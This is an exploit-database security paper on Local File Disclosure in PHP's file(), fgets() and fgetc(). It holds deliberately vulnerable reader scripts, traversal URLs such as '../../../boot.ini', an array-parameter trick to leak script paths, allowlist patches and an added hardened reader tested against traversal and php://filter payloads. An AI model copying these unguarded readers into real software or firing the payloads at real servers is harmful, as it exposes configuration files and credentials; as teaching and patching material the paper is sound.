File(),Fgets(),Fgetc() Local File Disclosure (LFD) Paper

 
http://www.exploit-db.com/exploits/11497

/*!----------------------------------------------------------*/
/*! File(),Fgets(),Fgetc() Local File Disclosure (LFD) Paper */                        
/*! Author   : hexon 				             */                             
/*! Tested On: Windows XP Home Edition SP2 & SP3             */
/*! Contact  : hkhexon@gmail.com                             */       
/*! Date     : 19th January 2010                             */   
/*!----------------------------------------------------------*/

=======
Preface
=======

As the title says, this is a paper about Local File Disclosure (LFD). You may ask why I wrote it, since others have already documented the same class of flaw in other file-reading functions:

Malaysian Script Kiddy (as requested) Ahlspiess - file_get_contents(), readfile()
Romanian Hacker Sirgod - file_get_contents(), readfile()
Lebanon Hacker Moudi - readfile()
French (if not mistaken) Hacker 599eme Man - readfile()

and now

(Unknown) Pentester Hexon - file(), fgets(), fgetc()

Since they have covered those sinks, I will introduce three more. They are seen less often in real code than file_get_contents() or readfile(), but the exploitation and patching notes below apply equally to the methods shown by the other four.

NOTE : I do not hold any responsibility for what you do with the skills described in this paper.

=====
Intro
=====

Local File Disclosure is a flaw where the attacker can read the contents of files on the webserver, including the source code of the PHP scripts themselves, because a filename taken from the user is passed straight into a file-reading function. Combined with directory traversal, an attacker can read important files like config.php, where usernames and passwords are stored, and then use those credentials against the server. Note that fopen() and file() also accept PHP stream wrappers, so when allow_url_fopen is enabled the same sink can fetch remote URLs as well as local files.

=====================
Proof Of Concept(POC)
=====================

A Proof Of Concept (POC) is needed to show that the theory works.

NOTE : You will need a webserver with PHP to run the PHP code, so install a package like xampp (http://www.apachefriends.org/en/xampp.html).

Open a text editor and copy and paste the code.

Put all the files in the document root of your server, e.g. /www/ for vertigo or /htdocs/ for xampp. The URLs below assume a subfolder named "test" inside that root (e.g. htdocs/test/).

=======
fgets()
=======

Save the following codes as fgets.html

/*! Code Start */

<html>
<head>
<title>Fgets() POC</title>
</head>
<body>
<form action="fgets.php" method="get">
fgets() vulnerability <br />
<input type="text" name="fgets" />
<input type="submit" />
</form>
</body>
</html>

/*! End Code */

Save the following codes as fgets.php

/*! Code Start */

<?php

$vuln = fopen($_GET['fgets'],"r+") or exit("unable to open the specified file"); // vulnerable code: the filename comes straight from the user
/*
"r" is enough for reading; "r+" also works but needs write permission on the file. Do not use "w" or "w+" (they truncate the file), nor "a","a+","x" and "x+" (they are not for reading).
*/

while(!feof($vuln))
{
echo fgets($vuln) . "<br />";
}

fclose($vuln);

?>

/*! End Code */

=======
fgetc()
=======

Save the following codes as fgetc.html

/*! Code Start */

<html>
<head>
<title>Fgetc() POC</title>
</head>
<body>
<form action="fgetc.php" method="get">
fgetc() LFD vulnerability <br />
<input type="text" name="fgetc" />
<input type="submit" />
</form>
</body>
</html>

/*! End Code */

Save the following codes as fgetc.php

/*! Code Start */

<?php

$vuln = fopen($_GET['fgetc'],"r+") or exit("unable to open the specified file");  // vulnerable code: the filename comes straight from the user

/*
"r" is enough for reading; "r+" also works but needs write permission on the file. Do not use "w" or "w+" (they truncate the file), nor "a","a+","x" and "x+" (they are not for reading).
*/

while(!feof($vuln))
{
echo fgetc($vuln);   // NOTE : fgetc() returns one byte per call, so it is slow on big files.
}

fclose($vuln);

?>

/*! End Code */

======
file()
======

Save the following codes as file.html

/*! Code Start */

<html>
<head>
<title>File() POC</title>
</head>
<body>
<form action="file.php" method="get">
file() POC <br />
<input type="text" name="file" />
<input type="submit" />
</form>
</body>
</html>

/*! End Code */

Save the following codes as file.php

/*! Code Start */

<?php

$vuln =file($_GET['file']);  // the vulnerable code

print_r($vuln);     // file() returns the lines of the file as an array, so print_r() is used to dump it.

?>

/*! End Code */

============
Exploitation
============

NOTE : Make sure that your Apache server is running and the files are in the right location.

Open fgets.html through the webserver in your browser (do not open it directly by double-clicking the file, or the form will never reach PHP).

Example:

http://localhost/test/fgets.html

Method:
A textbox will appear. Type the "filename" with its "extension" that you want to read and click "Submit".

The method is the same for the other two.

Example:

http://localhost/test/fgetc.html

http://localhost/test/file.html

Just enter the filename and click Submit.

After you click Submit, the form sends you to fgets.php, fgetc.php or file.php (depending on which one you used), and the requested file is echoed back to you.

Example :

http://localhost/test/fgets.php?fgets=filename.extension

http://localhost/test/fgetc.php?fgetc=filename.extension

http://localhost/test/file.php?file=filename.extension

====================
Further Exploitation
====================

Skills Required : Directory Traversal (required), Full Path Disclosure (FPD) or Partial Function Disclosure (PFD) (optional)

===================
Directory Traversal
===================

We can read files from other folders by applying the Directory Traversal technique.

Each "../" moves one folder up from the directory the script runs in, so prefixing the filename with "../" reads a file from the parent folder.

Example:

http://localhost/test/fgets.php?fgets=../filename.extension

http://localhost/test/fgetc.php?fgetc=../filename.extension

http://localhost/test/file.php?file=../filename.extension

We can climb further up the tree by adding more "../".

Example of exploitation with directory traversal (Windows only, since boot.ini is a Windows file; on other systems pick a file the webserver account is allowed to read):

http://localhost/test/fgets.php?fgets=../../../boot.ini

http://localhost/test/fgetc.php?fgetc=../../../boot.ini

http://localhost/test/file.php?file=../../../boot.ini

NOTE : There are a lot of files that you can read once you know the layout of the server; use your imagination.

===========================
Partial Function Disclosure
===========================

We can apply the Partial Function Disclosure (PFD) trick, which is to add [] in front of "=" so that the parameter arrives as an array instead of a string.

http://localhost/test/fgets.php?fgets[]=

http://localhost/test/fgetc.php?fgetc[]=

http://localhost/test/file.php?file[]=

fopen() and file() expect a string, so PHP raises a warning, and when display_errors is on the warning includes the absolute path of the script (a Full Path Disclosure). That path tells us exactly how many "../" are needed to reach a target. (Newer PHP versions throw a TypeError instead of a warning, but the uncaught error message still names the script path.)

Example: (fgets.php is used)

http://localhost/test/fgets.php?fgets[]=

Warning: fopen() expects parameter 1 to be string, array given in I:/xampp/htdocs/test/fgets.php on line 3

I will not discuss how to fix this here as it is outside the scope of this paper; maybe I will include it in my next paper.

========
POC Test
========

This POC has been tested by me and Ahlspiess on Windows XP SP2 and SP3, but the PHP functions involved behave the same on every OS; only the paths of the target files differ.

=====
Patch
=====

Since we have a way to exploit it, there must be a way to patch it.

This section is for web developers/webmasters, as well as pentesters who are not familiar with this flaw.

I have two ways of patching it.

=======
Primary
=======

Remove it. Most web applications have no reason to open a file whose name is supplied by the user, and a webmaster can read the source of any file without going through the web application.

=========
Secondary
=========

If you insist on keeping it, use a switch or if statement to restrict the user to a fixed list of filenames. I use switch here as it reads better for a list of allowed names. The check has to run before the file is opened; otherwise the file is still opened for every request and the "unable to open" message still tells the attacker whether a file exists.

Edit the code as shown below, or make new files and delete the old ones.

=========
fgets.php
=========

/*! Code Start */

<?php

switch($_GET['fgets'])            // switch filters user input BEFORE the file is opened
{
case 'a.html':                    // any filename would be appropriate.
case 'b':                         // any filename would be appropriate.
case 'd.php':                     // any filename would be appropriate.
case 'filename.extension':        // any filename would be appropriate. (all cases fall through to the body below)

$vuln = fopen($_GET['fgets'],"r") or exit("unable to open the specified file"); // only reached for an allowed name
/*
"r" is enough for reading; "r+" also works but needs write permission on the file. Do not use "w" or "w+" (they truncate the file), nor "a","a+","x" and "x+" (they are not for reading).
*/
while(!feof($vuln))
{
echo fgets($vuln) . "<br />";
}

fclose($vuln);
break;

default:                          // for those who read files not in the list
echo "You do not have the permission to read this specific file";
}
?>

/*! End Code */

=========
fgetc.php
=========

/*! Code Start */

<?php

switch($_GET['fgetc'])                    // switch filters user input BEFORE the file is opened
{
case 'a.html':                          // any filename would be appropriate.
case 'b':                               // any filename would be appropriate.
case 'd.php':                           // any filename would be appropriate.
case 'filename.extension':              // any filename would be appropriate. (all cases fall through to the body below)

$vuln = fopen($_GET['fgetc'],"r") or exit("unable to open the specified file"); // only reached for an allowed name

/*
"r" is enough for reading; "r+" also works but needs write permission on the file. Do not use "w" or "w+" (they truncate the file), nor "a","a+","x" and "x+" (they are not for reading).
*/

while(!feof($vuln))
{
echo fgetc($vuln) ." ";
}

fclose($vuln);
break;

default:                                // for those who read files not in the list
echo "You do not have the permission to read this specific file";
}

?>

/*! End Code */

========
file.php
========

/*! Code Start */

<?php

switch($_GET['file'])                  // switch filters user input BEFORE the file is read
{
case 'a.html':                         // any filename would be appropriate.
case 'b':                              // any filename would be appropriate.
case 'd.php':                          // any filename would be appropriate.
case 'filename.extension':             // any filename would be appropriate. (all cases fall through to the body below)

$vuln = file($_GET['file']);           // file() now only runs for an allowed name
print_r($vuln);                        // file() returns the lines as an array, so print_r() dumps it.
break;

default:                               // for those who read files not in the list
echo "You do not have the permission to read this specific file";
}

?>

/*! End Code */
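The Directory Traversal, Partial Function Disclosure and Secondary patch sections above all come down to one question: which names should be allowed to reach fopen() or file() at all? The following is an added example, not code from the original paper, of a reader that answers that before touching the filesystem. It checks that the parameter is a string (which defeats the fgets[]= array trick and the warning that leaks the script path), rejects anything that is not a bare filename (which removes "../", drive letters and stream wrappers such as php://), consults an allowlist, and finally confines the canonical path with realpath() so a symlink inside the served folder cannot point outside it. The function and constant names, the "public" directory and the demo files it creates are this example's own and are constructed for illustration. Run it with the PHP CLI: it builds a temporary folder, plants one allowlisted file and a fake config.php one level above it, and prints which of the paper's payloads are served or denied.

```php
<?php
// Added example (not from the original paper): a hardened replacement for the
// fgets.php / fgetc.php / file.php readers. All names below are this example's own.

declare(strict_types=1);

// Bare file names the application is willing to serve (compare with the paper's case labels).
const ALLOWED_BASENAMES = ['a.html', 'b', 'd.php', 'filename.extension'];

/**
 * Return the contents of $requested if it is a plain string, an allowlisted bare
 * filename, and resolves to a regular file inside $base; otherwise return null.
 * Every failure returns the same null so the caller emits one generic message:
 * no "unable to open" oracle and no fopen() warning carrying the script path.
 */
function safe_read_file(string $base, $requested): ?string
{
    // 1. Type check first: ?fgets[]= makes this an array; the paper's code passed
    //    it to fopen(), whose warning disclosed the full path of the script.
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    // 2. Only bare file names: no "/" or "\" (kills ../), no ":" (kills C: and
    //    wrappers such as php:// or http://), no NUL byte.
    if ($requested !== basename($requested) || strpbrk($requested, "/\\:\0") !== false) {
        return null;
    }
    // 3. Allowlist BEFORE any filesystem access; the paper's switch() ran after fopen().
    if (!in_array($requested, ALLOWED_BASENAMES, true)) {
        return null;
    }
    // 4. Confine: realpath() canonicalises ../ and symlinks, so the resolved file
    //    must start with the resolved base directory plus a separator.
    $realBase = realpath($base);
    $realPath = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($realBase === false || $realPath === false || !is_file($realPath)) {
        return null;
    }
    if (strncmp($realPath, $realBase . DIRECTORY_SEPARATOR, strlen($realBase) + 1) !== 0) {
        return null; // a symlink inside $base pointed outside it
    }
    $data = file_get_contents($realPath);
    return $data === false ? null : $data;
}

// --- Constructed demo (CLI): a temporary layout with one allowlisted file and a
// --- fake config.php one level above it, then the paper's payloads against the reader.
$tmp  = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfd_demo_' . bin2hex(random_bytes(4));
$base = $tmp . DIRECTORY_SEPARATOR . 'public';
mkdir($base, 0700, true);
file_put_contents($base . DIRECTORY_SEPARATOR . 'a.html', "<h1>public page</h1>\n");
file_put_contents($tmp . DIRECTORY_SEPARATOR . 'config.php', "<?php \$db_pass = 'constructed';\n");

$probes = [
    'a.html',                                                   // allowlisted -> served
    '../config.php',                                            // traversal -> denied
    '../../../boot.ini',                                        // traversal -> denied
    'php://filter/read=convert.base64-encode/resource=a.html',  // wrapper -> denied
    ['a.html'],                                                 // ?fgets[]=a.html -> denied
    'd.php',                                                    // allowlisted but absent -> denied
];
foreach ($probes as $p) {
    $label  = is_array($p) ? 'array(' . implode(',', $p) . ')' : $p;
    $result = safe_read_file($base, $p);
    printf("%-60s %s\n", $label, $result === null ? 'DENIED' : 'served ' . strlen($result) . ' bytes');
}

// Tidy up the demo files.
unlink($base . DIRECTORY_SEPARATOR . 'a.html');
unlink($tmp . DIRECTORY_SEPARATOR . 'config.php');
rmdir($base);
rmdir($tmp);
```

In a web handler the same function replaces the whole body of fgets.php: call safe_read_file(__DIR__ . '/public', $_GET['fgets'] ?? null), send a plain 404 when it returns null, and echo the result otherwise. Keep display_errors off in production regardless, since the allowlist protects this one sink but not every other place a warning might mention a path.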

======
Greetz
======

/*! My mind, feel free to contact me if you have something to ask/contribute */
/*! Ahlspiess for testing my LFD theory and giving ideas even though I didn't use them */
/*! w3schools (www.w3schools.com/) */
